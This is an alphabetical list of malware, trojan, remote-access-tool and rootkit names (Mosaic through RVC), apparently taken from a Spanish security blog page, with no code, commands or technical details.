Mosaic
Moscas
Moscow Email trojan
Moses
MoSucker
MoSucker plug-ins
Motalases
MOTD
MotIv FTP
Motley Crue
Mouse Joke
Movie
Movie.avi
Movie Pif worm
Movie trojan
MovieWorld
Mozilla
Mr. Sender
Mr Smart
Mraz
MrWormy
MS checker
MscanWorm
MSD
MSGate
Msic
Msinit
MSK
Msn Cookie
MSN Crack
MSN Spider
MSNTrick
MSREXE
Mstream
MTX
MTX II
Mucks
Muhahah
Multi binder
MultiCQ
Multidropper
Multijoke
Multimedia, Lithium plug-in
MultiMorph
MultiPad
Musdie
Music
MuSka52
Mustard
Muzk
MXBot
Mxc
My collection
My Very Own trojan
Myba
MyLife
Mylinong
MyParty
Mypic
Mypics
MyPicture
MyPower
MyRAT
Mysocket
Myst Eclipse
Nabob
Naebi
Naebi ZIP files
Nahata
Nail
Najort
Naked Wife
Nakter Affe
Namaz
Nanu
Napalm
Nariz
NatalCom
Natas
Natay
Nauka
Nautical
Nawai
Naver
Navidad
Nazburg
NB Spy
NB worm
NB5566
NBHack
NBPro20Reg
NCX
Ndad
Neat
Necro
Nedal
Neer
Neiber
Nemesis
Nemite
Neno
Neo City
NeoArk
NeoLite
Neoturk
Nephron
NERax
NerTe
Net Administrator
Net Advance
Net Boost
Net Control 2
Net Controller
Net Controller Port Finder
Net Grisch
Net Hero
Net Master
Net Metropolitan
Net Spider
Net Trash Xs
Net-Devil
Net-Devil CGI-logger
Net666
NetAmine
Netav
NetBarrier_1.6 updater
NetBoy
NetBUIE
NetBus
NetBus 2.0 Pro
NetBus 2.0 Pro Hidden
NetBus dropper
NetBus Offline Hunter
Netbus Password Hacker
NetBus Patcher
NetBus patches
Netbus Snooper
NetBus Toy
NetBus worm
NetBus XP
NetBuster Killer
Netcoach
NetConfig
NetControle
NetControle
NetCrack
NetDemon
NetEyes
Netget
NetHack
Nethief
Netkey
Netlog
Netmail
NetMail
Netministrator
Netmon
Netmonn
Netol
NetPatch
NetPocalypse
NetRaider
Netrecorder
Netres
NetRex
NETrojan
Netscape Reg Voo Doo
NetSid
NetSnake
NetSnooper
NetSnooper Gold
NetSphere
NetSpy
NetSpy
NetSpy (DK)
NetTaxi
NetTrash
NetTrojan
Netvaiser
NetWare Login
Netware Trojan
Network
Network Crack Wizard
Network Error
Network Terrorist
NetVoyeur
NetX Remote Like
NetXDetect
NeueTarife
Neurotic Kitten
NeuroticKat
New Love
New Moscow
New Silencer
New2001
NewApt worm
Newblade
Never Ending Story
Newfuture
NewsFlood
NewsTick
NewWorld
neXus
Nexzusdamus
Nice Day trojan
Night
Nightflight
Nightmare
Nikita
Niklaus
Nimda
Nina
Ninja
Nirvana
nlw
NM
NMBK
NMKB
NMVT
No Vowel Prank
Noarn
NoBackO
NoClose
NoDesk
Nogzoeen
NokNok
Nolite
NoMercy
Noname Trojan
Noob
Noodler
Noon
Noped
Nople
NOSecure
Nota
NovaPasta
Novell Login
NoWobbler
NoXcape
NssKill
NT Kap
NT Remote Controller 2000
NT RootKit
NTFX
nttmyh
Nuke
Nuker
NukeX
Nullbot
NullSys
Numgame
NumLock
NutShell
Oblivion
Oblivion Dropper Source Generator
Oblivion Joiner
Obsidian
OCE
Offensive
Offline Keylogger, MoSucker plug-in
Oggy Froggy
OH Upgrader
Olive
Olvort
Olvortex
Omega
Omega
OMPN Magic
ON 64
On4ever
Onalf
One of the Last Trojans
One of the Last Trojans
One Windows Trojan
OneTime
OnLine
OnLine KeyLogger
Onliner
OntheFly
ONZ
Opaserv
OpC BO
OpenBSD rootkit
OpenSSH backdoor
OpenSSH patch
Optickit
Optix Killer
Optix Lite
Optix Lite Firewall Bypass Special Addition
Optix Pager
Optix Pro
Optiz
OpwinTRojan
Oracle
Orchid
Orig
Orion
Orochi
Oror
OS
Osiris
Osm
Out
Outlook Overflow
ovasOn
Over
Over G trojan
OverBuf.gen
overkill Red Hat 7.0 rootkit
Overnuke
OverQuota
Oxon
Ozkan
Packer 95
Pacol
Pada
PAL
Paltalk
Pamela Slides
Pando
Pantheon
Panther
Papeator
Paper Waster
Para
Paradise trojan
Paragon Network
Parasite
Parkin
Parody
Parol
Parrot
Parvo
Pasana
Pass
PassGrab
PassOn
PassView
Password Mailer
Password Steal trojan 7
Password Stealer
Password Theft trojan
Password Thief
Password trojan
Paukor
Payback
PC Crasher
PC Invader
PC Protect
PC Remote Control
PDialer
Pdoor
PE Bundle
PE Diminisher
PE-intro adder
Peace
Peace
Peachy
Peanut Brittle
Pec
PECompact
Pedophilia
PEElf
Peeper
Pelic
Penis trojan
Penrox
PEPack
Pepex
Permabot
Perrun
Pest
Pest Remote Keylogger
Pet_ticky
Petik
Petik VBS
Petite
PetLil
Phage
Phage
Phantasmagoria
Phantom 2
Phantom FTP
Phantom FTP server
Phase Zero, Phase-0
Phase-1
Phaza
phf.c
Phide
Phineas Phucker
Phoenix II
Photos17
Phram
Phreak
Phybre
Pica
Picshow
Pie Bill Gates
Piece
PIF worm
Pilantra
PimpCo
Ping
Ping
Ping server
Pink worm
Pinkle
Pino Keylogger
Pinochet
Pinworm
Pioneer
Pipes
Pirus
Pitbul
Pitbull
PitFall
PitFall Surprise Attack
Pixo
Pizdakit
Pizza
PKLite
PKZip Trojan
Placid
Plage 2000
Plan
Platan
PlayX
PLD
Plea
Pleh
Plexis
PLICT
Plimo
Plugbot
Pneuma
Pnguin
Pnuff
Pokemon
PolicyNewk
Polydrop
Polymorphic Web Downloader Generator
PolyPedo
Pong
Pops
Popups5
Porkodio
Porky
Porma
Porndial
Pornu
Port25
Portacopo:br
Portal of Doom
Portd
PortFuck
Postcard
POTEXT
Potok
Power
PowerDoD
Powerload
PowerMerger
Pox on you
PreCursor
Predator
Prekvape
Prepend
Pretty
PrettyPark
Prevender
Price
PriceDoc
Pricol
Primetime
Printer Spitter
Priority
Private Port
Process Stack Faker
ProcessMate
Profman
Progenic ICQ Password Stealer
Progenic Mail Trojan Construction Kit
Progenic Password Thief
Progenic trojan
Progenic Trojan Maker
Projax
Project Mayhem
Project nEXT
Pron
Propel
Propeler
Prophecy
Prosiak
Protocol 666
Protoss
Proude
Prova
Provder
Prowler
PS.ok
Pseudo RAT
Pst Ince
Psyber Stream Server
PSYcho Files
Psycho´s Nightmare
Psychothug
PsychWard
Ptakks
PTNet
Ptsnoop
PublicEnemy
Pure
PushBoot
Puzzle
pvds
PWSteal
PWSteal 1122
PWSteal 1216
PWSteal 1260
PWStroy
PWT
Pzychotron (was Lotus)
Q
Q-taz
Qaz
QB2C.Duck
Qfat
Qiwei
QRabid
Qroject DualDownloader
Qroject MultiDownloader
Qroject WebDownloader
QSD23
Qstart
QtroDel / QreoDel
Quatro
QueBus
Quetnek
Quimera
Quin
Quiz
QwErTos RAT
QXRay
QZap14
R0xr4t
R16
RA Logger
Ra1d
Rabbit
rada-tat-RAT
Radix
Radlight
Rahiworm
Rahma
Rainbow
RAM Eater
Ramen
Ramenfind
Ramus
Raptor 4.0 Update
RAS Dialer
RAS Faker
RAS-Patch
Rasmin
Rast
RAT Cracker
RAT Pack
RAT packer
Rat Scanner
Ratcracker
Rathead
Rattler
Rawin
Raylight
RBBS
RC1 trojan
RC5 Trojan
Rcon
RCServ
ReadMe
Readme.1077
Real 2000
Reality
Reaper
Rebate
Reboot
Rebooter
Red Team
Redesi
Redlof
Redneck
RedShad
REG System
Regap
Regbomb
RegForm
Regreside
RegWiz
Reizfaktor
Relmony
Rembomb
RemEye
RemoConChubo
Remod
Remodulator
Remote Admin Extension
Remote Administration Tool – RAT
Remote Administration Tool – RAT [no 2]
Remote Administration Window
Remote Administrator
Remote Anything
Remote Bomber
Remote Boot Tool
Remote Command Router
Remote Computer Control Center
Remote Control
Remote Control NT
Remote Controler
Remote Explorer 2000
Remote Explorer Y2K
Remote Eye
Remote Grab
Remote Hack
Remote HAVOC
Remote Havok
Remote Keylogger
Remote Modem Control
Remote Operations
Remote Process Monitor
Remote Revise
Remote Saucer
Remote Screen Capture
Remote Shell
Remote Shut
Remote Storm
Remote Toolkit
Remote Typer
Remote Windows Shutdown – RWS
Remote XS
RemoteHAK
RemoteMS
RemoteNC
Remove Anything
Remplace
RemScan
Rendezvous
Req
Reset
ResHacker
Resizer
Resreg
Resume
Retail
Retribution
Retrieve
RevDen
Revel
Reven
Revenger
Revenger Setup
Reverb
Reverse Pimpage
Reverse Trojan
Reverse WWW Tunnel Backdoor
Rewin
REx
Rexli
RexxRave
Rf Poison
Rfpmgrtoet
rh[67]-shaper
Rhino
RHS
Ribas
Ric
Ricta
Ringworm.ow
RingZero
RIP
Ripper Pro
Ritter
Rizal
RizBeat
RK 17
RK15 rootkit
Rkit
RM Toolkit
RMF_FN
RNS Exe Joiner
RNS Keylogger
Robo-Hack
Rocket
Rocks
Rockstar
Rol
Romanian rootkit
Romort
Rootcmd
Rootkit
Rootkit IDA
Rootkit In A LKM
Rootlet
Rorex
Ros
Route32b
Row
RPC Backdoor
RSHA
rshd trojan
RTB 666
Rude
Ruler
Run
RunAuto
RunIRC
RunLaunch
Runner
RunScript
Russian Guard trojan
Russian Roulette
Rux
RUX The TIc.K
RVC



Categorías:Informática, Seguridad Etiquetas: , ,